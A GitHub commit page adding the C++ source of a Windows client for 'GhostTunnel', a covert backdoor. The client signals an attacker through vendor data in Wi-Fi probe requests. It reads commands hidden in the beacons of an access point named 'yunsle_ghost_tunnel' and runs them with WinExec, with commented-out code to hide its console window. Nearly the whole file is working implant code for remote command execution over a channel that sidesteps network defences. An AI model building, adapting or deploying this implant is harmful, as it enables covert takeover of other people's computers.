forked from BaiZhanJi0x0/GhostTunnel
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
已经兼容到VS2013,对一些小错误进行了修改。但是目前只能执行一次命令
- Loading branch information
1 parent
2c53a59
commit 0f64669
Showing
1 changed file
with
298 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,298 @@ | ||
#ifndef UNICODE | ||
#define UNICODE | ||
#endif | ||
#include "stdafx.h" | ||
#include <windows.h> | ||
#include <wlanapi.h> | ||
#include <objbase.h> | ||
#include <wtypes.h> | ||
|
||
#include <stdio.h> | ||
#include <stdlib.h> | ||
|
||
// Need to link with Wlanapi.lib and Ole32.lib | ||
#pragma comment(lib, "wlanapi.lib") | ||
#pragma comment(lib, "ole32.lib") | ||
|
||
//payload数据结构 | ||
struct ie_data | ||
{ | ||
unsigned char id; | ||
unsigned char len; | ||
unsigned char val[1]; | ||
}; | ||
|
||
|
||
int wmain() | ||
{ | ||
/* | ||
HWND hwnd; | ||
hwnd = FindWindow(L"ConsoleWindowClass", NULL); //处理顶级窗口的类名和窗口名称匹配指定的字符串,不搜索子窗口。 | ||
if (hwnd) | ||
{ | ||
ShowWindow(hwnd, SW_HIDE); //设置指定窗口的显示状态 | ||
} | ||
*/ | ||
|
||
// Declare and initialize variables. | ||
|
||
HANDLE hClient = NULL; | ||
DWORD dwMaxClient = 2; // | ||
DWORD dwCurVersion = 0; | ||
DWORD dwResult = 0; | ||
int iRet = 0; | ||
|
||
WCHAR GuidString[40] = { 0 }; | ||
|
||
int i; | ||
|
||
/* variables used for WlanEnumInterfaces */ | ||
|
||
PWLAN_INTERFACE_INFO_LIST pIfList = NULL; | ||
PWLAN_INTERFACE_INFO pIfInfo = NULL; | ||
|
||
//AVAILABLE属性 | ||
PWLAN_AVAILABLE_NETWORK_LIST pBssList = NULL; | ||
PWLAN_AVAILABLE_NETWORK pBssEntry = NULL; | ||
|
||
//添加的Bss属性 | ||
//PWLAN_BSS_ENTRY bss_entry = NULL; | ||
|
||
int iRSSI = 0; | ||
|
||
//封装payload | ||
struct ie_data *piedata = NULL; | ||
int response_len = 0; | ||
char *response = NULL; | ||
//yunsle定义len和buf | ||
int len = 18; | ||
char *buf = "command ok!!!!!!."; | ||
|
||
response_len = sizeof(WLAN_RAW_DATA) - 1 + sizeof(struct ie_data) - 1 + len; | ||
response = (char *)malloc(response_len); | ||
memset(response, '\0', response_len); | ||
//yunsle定义pwlan_data的类型为PWLAN_RAW_DATA | ||
PWLAN_RAW_DATA pwlan_data = (PWLAN_RAW_DATA)response; | ||
pwlan_data->dwDataSize = sizeof(struct ie_data) - 1 + len; | ||
|
||
piedata = (struct ie_data *)&pwlan_data->DataBlob[0]; | ||
piedata->id = (char)221; | ||
piedata->len = len; | ||
//buf为要发送的数据(最大长度240),len为数据长度 | ||
memcpy(&piedata->val[0], buf, len); | ||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
//循环接收命令 | ||
while (true) { | ||
|
||
//打开wlan句柄 | ||
dwResult = WlanOpenHandle(dwMaxClient, NULL, &dwCurVersion, &hClient); | ||
if (dwResult != ERROR_SUCCESS) { | ||
wprintf(L"WlanOpenHandle failed with error: %u\n", dwResult); | ||
// FormatMessage can be used to find out why the function failed | ||
return 1; | ||
} | ||
|
||
|
||
//枚举wlan设备 | ||
dwResult = WlanEnumInterfaces(hClient, NULL, &pIfList); | ||
if (dwResult != ERROR_SUCCESS) { | ||
wprintf(L"WlanEnumInterfaces failed with error: %u\n", dwResult); | ||
// FormatMessage can be used to find out why the function failed | ||
return 1; | ||
} | ||
else { | ||
wprintf(L"Num Entries: %lu\n", pIfList->dwNumberOfItems); | ||
wprintf(L"Current Index: %lu\n", pIfList->dwIndex); | ||
for (i = 0; i < (int)pIfList->dwNumberOfItems; i++) { | ||
pIfInfo = (WLAN_INTERFACE_INFO *)&pIfList->InterfaceInfo[i]; | ||
wprintf(L" Interface Index[%d]:\t %lu\n", i, i); | ||
iRet = StringFromGUID2(pIfInfo->InterfaceGuid, (LPOLESTR)&GuidString, 39); | ||
// For c rather than C++ source code, the above line needs to be | ||
// iRet = StringFromGUID2(&pIfInfo->InterfaceGuid, (LPOLESTR) &GuidString, 39); | ||
if (iRet == 0) | ||
wprintf(L"StringFromGUID2 failed\n"); | ||
else { | ||
wprintf(L" InterfaceGUID[%d]: %ws\n", i, GuidString); | ||
} | ||
wprintf(L" Interface Description[%d]: %ws", i, | ||
pIfInfo->strInterfaceDescription); | ||
wprintf(L"\n"); | ||
wprintf(L" Interface State[%d]:\t ", i); | ||
switch (pIfInfo->isState) { | ||
case wlan_interface_state_not_ready: | ||
wprintf(L"Not ready\n"); | ||
break; | ||
case wlan_interface_state_connected: | ||
wprintf(L"Connected\n"); | ||
break; | ||
case wlan_interface_state_ad_hoc_network_formed: | ||
wprintf(L"First node in a ad hoc network\n"); | ||
break; | ||
case wlan_interface_state_disconnecting: | ||
wprintf(L"Disconnecting\n"); | ||
break; | ||
case wlan_interface_state_disconnected: | ||
wprintf(L"Not connected\n"); | ||
break; | ||
case wlan_interface_state_associating: | ||
wprintf(L"Attempting to associate with a network\n"); | ||
break; | ||
case wlan_interface_state_discovering: | ||
wprintf(L"Auto configuration is discovering settings for the network\n"); | ||
break; | ||
case wlan_interface_state_authenticating: | ||
wprintf(L"In process of authenticating\n"); | ||
break; | ||
default: | ||
wprintf(L"Unknown state %ld\n", pIfInfo->isState); | ||
break; | ||
} | ||
wprintf(L"\n"); | ||
} | ||
} | ||
|
||
|
||
//发送payload——————start | ||
|
||
/*DWORD WINAPI WlanScan( | ||
_In_ HANDLE hClientHandle, | ||
_In_ const GUID *pInterfaceGuid, | ||
_In_opt_ const PDOT11_SSID pDot11Ssid, | ||
_In_opt_ const PWLAN_RAW_DATA pIeData, | ||
_Reserved_ PVOID pReserved | ||
);*/ | ||
/* | ||
typedef struct _DOT11_SSID { | ||
ULONG uSSIDLength; | ||
UCHAR ucSSID[DOT11_SSID_MAX_LENGTH]; | ||
} DOT11_SSID, *PDOT11_SSID; | ||
*/ | ||
PDOT11_SSID pdo = new DOT11_SSID; | ||
pdo->uSSIDLength = 19; | ||
UCHAR *ucp = NULL; | ||
ucp = (UCHAR *)&pdo->ucSSID; | ||
ucp = (UCHAR *)malloc(pdo->uSSIDLength); | ||
memset(ucp, '\0', pdo->uSSIDLength); | ||
strcpy_s((char*)ucp, sizeof("yunsle_ghost_tunnel"),"yunsle_ghost_tunnel"); | ||
dwResult = WlanScan(hClient, &pIfInfo->InterfaceGuid, NULL, pwlan_data, NULL); | ||
if (dwResult != ERROR_SUCCESS) { | ||
wprintf(L"WlanScan failed with error: %u\n", dwResult); | ||
return 1; | ||
} | ||
else { | ||
printf("已发送上线请求!!\n"); | ||
} | ||
//发送payload——————end | ||
free(pdo); | ||
|
||
//获取可用AP | ||
dwResult = WlanGetAvailableNetworkList(hClient, | ||
&pIfInfo->InterfaceGuid, | ||
0, | ||
NULL, | ||
&pBssList); | ||
|
||
if (dwResult != ERROR_SUCCESS) { | ||
wprintf(L"WlanGetAvailableNetworkList failed with error: %u\n", | ||
dwResult); | ||
//dwRetVal = 1; | ||
// You can use FormatMessage to find out why the function failed | ||
} | ||
else { | ||
//wprintf(L"WLAN_AVAILABLE_NETWORK_LIST for this interface\n"); | ||
|
||
//wprintf(L" Num Entries: %lu\n\n", pBssList->dwNumberOfItems); | ||
|
||
//这里如果j从0开始,会有重复SSID项,原因不明,但不是引起多次执行命令的原因 | ||
for (int j = (pBssList->dwNumberOfItems) / 2; j < pBssList->dwNumberOfItems; j++) { | ||
pBssEntry = | ||
(WLAN_AVAILABLE_NETWORK *)& pBssList->Network[j]; | ||
|
||
//wprintf(L" 测试输出: %lu\n\n", pBssEntry->dot11BssType); | ||
//获得BSS的LIST | ||
//为了接收Probe Response帧,并解析出指令代码 | ||
PWLAN_BSS_LIST ppWlanBssList; | ||
DWORD dwResult2 = WlanGetNetworkBssList(hClient, &pIfInfo->InterfaceGuid, | ||
&pBssEntry->dot11Ssid, | ||
pBssEntry->dot11BssType, | ||
pBssEntry->bSecurityEnabled, | ||
NULL, | ||
&ppWlanBssList); | ||
//错误处理 | ||
if (dwResult2 != ERROR_SUCCESS) { | ||
wprintf(L"WlanGetNetworkBssList failed with error: %u\n", | ||
dwResult2); | ||
} | ||
|
||
if (pBssEntry->dot11Ssid.uSSIDLength == 0) | ||
//wprintf(L"\n"); | ||
break; | ||
else { | ||
//循环遍历AVAILABLE的BSSLisst数据 | ||
for (int z = 0; z < ppWlanBssList->dwNumberOfItems; z++) | ||
{ | ||
WLAN_BSS_ENTRY *bss_entry = &ppWlanBssList->wlanBssEntries[z]; | ||
//添加判断是否是yunsle | ||
if (_stricmp((char *)bss_entry->dot11Ssid.ucSSID, "yunsle_ghost_tunnel") == 0) { | ||
printf("找到控制端!\n"); | ||
char *pp = (char *)((unsigned long)bss_entry + bss_entry->ulIeOffset); | ||
int total_size = bss_entry->ulIeSize; | ||
//printf("长度:%d",total_size); | ||
for (;;) { | ||
ie_data * ie = (struct ie_data *)pp; | ||
if ((int)ie->id == 221) | ||
{ | ||
//printf("221!!!!!\n"); | ||
// eg. "ccccmd /c notepad" | ||
char *magic = (char *)&ie->val[0]; | ||
printf(magic); | ||
printf("\n"); | ||
if (strncmp(magic, "ccc", 3) == 0) | ||
{ | ||
char command[240] = { 0 }; | ||
strncpy_s(command, magic + 3, ie->len - 3); | ||
//执行命令 | ||
printf("提取命令:%s\n", command); | ||
WinExec(command, SW_NORMAL); | ||
exit(1); //退出 | ||
break; | ||
} | ||
} | ||
pp += sizeof(struct ie_data) - 1 + (int)ie->len; | ||
total_size -= sizeof(struct ie_data) - 1 + (int)ie->len; | ||
if (!total_size) | ||
{ | ||
break; // over | ||
} | ||
|
||
} | ||
} | ||
} | ||
|
||
// wprintf(L"\n"); | ||
} | ||
|
||
} | ||
} | ||
//间隔 | ||
Sleep(3000); | ||
} | ||
|
||
if (pBssList != NULL) { | ||
WlanFreeMemory(pBssList); | ||
pBssList = NULL; | ||
} | ||
|
||
if (pIfList != NULL) { | ||
WlanFreeMemory(pIfList); | ||
pIfList = NULL; | ||
} | ||
return 0; | ||
} |